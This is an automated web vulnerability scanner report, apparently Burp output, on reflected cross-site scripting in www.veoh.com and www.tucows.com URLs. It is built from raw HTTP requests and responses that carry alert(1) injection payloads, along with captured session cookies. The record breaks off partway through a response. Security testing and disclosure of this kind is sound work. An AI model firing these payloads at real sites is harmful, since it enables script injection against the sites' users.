GET /videoegg/ad.html97844"-alert(1)-"e3ce1315cea HTTP/1.1 Host: www.tucows.com Proxy-Connection: keep-alive Referer: http://www8.tucows.com/delivery/afr.php?zoneid=187&cb=6253c4ae Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmc=163973946; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utmb=163973946; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:23:06 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 31933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e was submitted in the REST URL parameter 4. This input was echoed as 9d235"><img src=a onerror=alert(1)>9e252f7871e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure9d235"><img%20src%3da%20onerror%3dalert(1)>9e252f7871e HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:46 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=59 Content-Length: 57827
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure9d235"><img src=a onerror=alert(1)>9e252f7871e/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 was submitted in the REST URL parameter 4. This input was echoed as f4b0c<img src=a onerror=alert(1)>88040cf1d82 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuref4b0c<img%20src%3da%20onerror%3dalert(1)>88040cf1d82 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:50 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=80 Content-Length: 57783
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref4b0c<img src=a onerror=alert(1)>88040cf1d82"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34 was submitted in the REST URL parameter 4. This input was echoed as 71e6c"><img src=a onerror=alert(1)>96f11e9dd34 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure71e6c"><img%20src%3da%20onerror%3dalert(1)>96f11e9dd34/watch/v18647177dJ8p2YBE HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:35:23 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=87 Content-Length: 77754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure71e6c"><img src=a onerror=alert(1)>96f11e9dd34/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22 was submitted in the REST URL parameter 4. This input was echoed as 8fa41<img src=a onerror=alert(1)>55c9c937f22 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure8fa41<img%20src%3da%20onerror%3dalert(1)>55c9c937f22/watch/v18647177dJ8p2YBE HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:36:47 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=65 Content-Length: 77710
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure8fa41<img src=a onerror=alert(1)>55c9c937f22"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfc58'%3bc01f25840e4 was submitted in the REST URL parameter 6. This input was echoed as cfc58';c01f25840e4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18647177dJ8p2YBEcfc58'%3bc01f25840e4 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:26 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=72 Content-Length: 94329
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc was submitted in the REST URL parameter 4. This input was echoed as fbdf3"><img src=a onerror=alert(1)>42b09b361cc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurefbdf3"><img%20src%3da%20onerror%3dalert(1)>42b09b361cc/watch/v189741093prNNZM5 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:16 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=43 Content-Length: 76768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurefbdf3"><img src=a onerror=alert(1)>42b09b361cc/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a was submitted in the REST URL parameter 4. This input was echoed as f8f48<img src=a onerror=alert(1)>a3fbcd0230a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventuref8f48<img%20src%3da%20onerror%3dalert(1)>a3fbcd0230a/watch/v189741093prNNZM5 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:33 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=20 Content-Length: 76724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventuref8f48<img src=a onerror=alert(1)>a3fbcd0230a"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22732'%3b900f2443f83 was submitted in the REST URL parameter 6. This input was echoed as 22732';900f2443f83 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v189741093prNNZM522732'%3b900f2443f83 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:38:44 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=86 Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb was submitted in the REST URL parameter 4. This input was echoed as bef9b"><img src=a onerror=alert(1)>63733810adb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurebef9b"><img%20src%3da%20onerror%3dalert(1)>63733810adb/watch/v18978294NGnK88j8 HTTP/1.1 Host: www.veoh.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK Vary: Accept-Encoding Date: Thu, 03 Feb 2011 21:37:41 GMT Connection: close Server: Apache/2.2.10 (Unix) PHP/5.2.6 X-Powered-By: PHP/5.2.6 Content-Type: text/html; charset=UTF-8 Keep-Alive: timeout=5, max=94 Content-Length: 76451
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventurebef9b"><img src=a onerror=alert(1)>63733810adb/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload be275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9 was submitted in the REST URL parameter 4. This input was echoed as be275<img src=a onerror=alert(1)>e6d8963fd9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventurebe275<img%20src%3da%20onerror%3dalert(1)>e6d8963fd9/watch/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 76397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventurebe275<img src=a onerror=alert(1)>e6d8963fd9"}</textarea>
...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6a1e'%3b1b1f85b69a1 was submitted in the REST URL parameter 6. This input was echoed as c6a1e';1b1f85b69a1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8c6a1e'%3b1b1f85b69a1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=9
Content-Length: 94049
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41 was submitted in the REST URL parameter 4. This input was echoed as 2e455<img src=a onerror=alert(1)>cd67645eb41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure2e455<img%20src%3da%20onerror%3dalert(1)>cd67645eb41/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=F28E893B-ED80-1EAE-894D-FC564C4FF0AB&LastUpdate=03/Feb/2011:12:31:55 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:31:55 GMT; Path=/
Date: Thu, 03 Feb 2011 20:31:56 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=87
Content-Length: 76407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure2e455<img src=a onerror=alert(1)>cd67645eb41"}</textarea>
...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0 was submitted in the REST URL parameter 4. This input was echoed as 5ce45"><img src=a onerror=alert(1)>b926a16b5e0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure5ce45"><img%20src%3da%20onerror%3dalert(1)>b926a16b5e0/watch/v18978294NGnK88j8/x22 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
